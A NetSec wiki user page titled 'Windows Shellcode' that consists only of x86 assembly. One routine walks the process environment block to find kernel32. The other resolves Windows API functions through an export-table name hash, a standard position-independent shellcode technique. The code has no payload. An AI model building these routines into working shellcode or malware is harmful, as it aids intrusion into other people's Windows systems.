Questions about this topic? Sign up to ask in the talk tab.
User:Hatter/Windows Shellcode
From NetSec
< User:Hatter
Revision as of 05:56, 7 April 2012 by LashawnSeccombe (Talk | contribs) (Created page with "{{code|text=<source lang="asm"> find_kernel32: pushad ; preserve all registers xor ecx, ecx ...")
find_kernel32:
pushad ; preserve all registers
xor ecx, ecx
mov esi, [fs:ecx + 0x30]
mov esi, [esi + 0x0C]
mov esi, [esi + 0x1C]
next_module:
mov ebx, [esi + 0x08]
mov edx, [esi + 0x20]
mov esi, [esi]
cmp [edx + 12 * 2], cx
jne short next_module
mov [esp + 0x1c], ebx
popad
ret
find_function:
pushad
mov ebp, [esp + 0x24]
mov eax, [ebp + 0x3c]
mov edx, [ebp + eax + 0x78]
add edx, ebp
mov ecx, [edx + 0x18]
mov ebx, [edx + 0x20]
add ebx, ebp
find_function_loop:
jecxz find_function_finished
dec ecx
mov esi, [ebx + ecx * 4]
add esi, ebp
compute_hash:
xor edi, edi
xor eax, eax
cld
compute_hash_again:
lodsb
test al, al
jz compute_hash_finished
ror edi, 0xd
add edi, eax
jmp compute_hash_again
compute_hash_finished:
cmp edi, [esp + 0x28]
jnz find_function_loop
mov ebx, [edx + 36]
add ebx, ebp
mov cx, [ebx + 2 * ecx]
mov ebx, [edx + 28]
add ebx, ebp
mov eax, [ebx + 4 * ecx]
add eax, ebp
mov [esp + 0x1c], eax
find_function_finished:
popad
ret
|
